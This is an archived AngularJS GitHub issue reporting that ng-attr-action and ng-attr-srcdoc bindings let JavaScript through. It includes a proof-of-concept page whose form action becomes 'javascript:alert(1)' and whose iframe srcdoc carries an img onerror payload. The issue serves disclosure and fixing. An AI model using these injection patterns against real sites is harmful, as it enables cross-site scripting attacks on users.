This repository was archived by the owner on Apr 12, 2024. It is now read-only.
ng-attr-action and ng-attr-srcdoc allow binding to JavaScript #4927
Closed
Description
Ref: https://code.google.com/p/mustache-security/wiki/AngularJS#The_State_of_AngularJS_1.2.0
<html ng-app>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0-rc.2/angular.min.js"></script>
</head>
<body>
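<!-- After interpolation the form's action attribute becomes "javascript:alert(1)" -->
<form ng-attr-action="{{'javascript:'}}alert(1)"><button>CLICK</button></form>
<!-- After interpolation the iframe's srcdoc attribute carries markup with an onerror handler -->
<iframe ng-attr-srcdoc="{{'<img src=x onerror=alert(1)>'}}"></iframe>
</body>
</html>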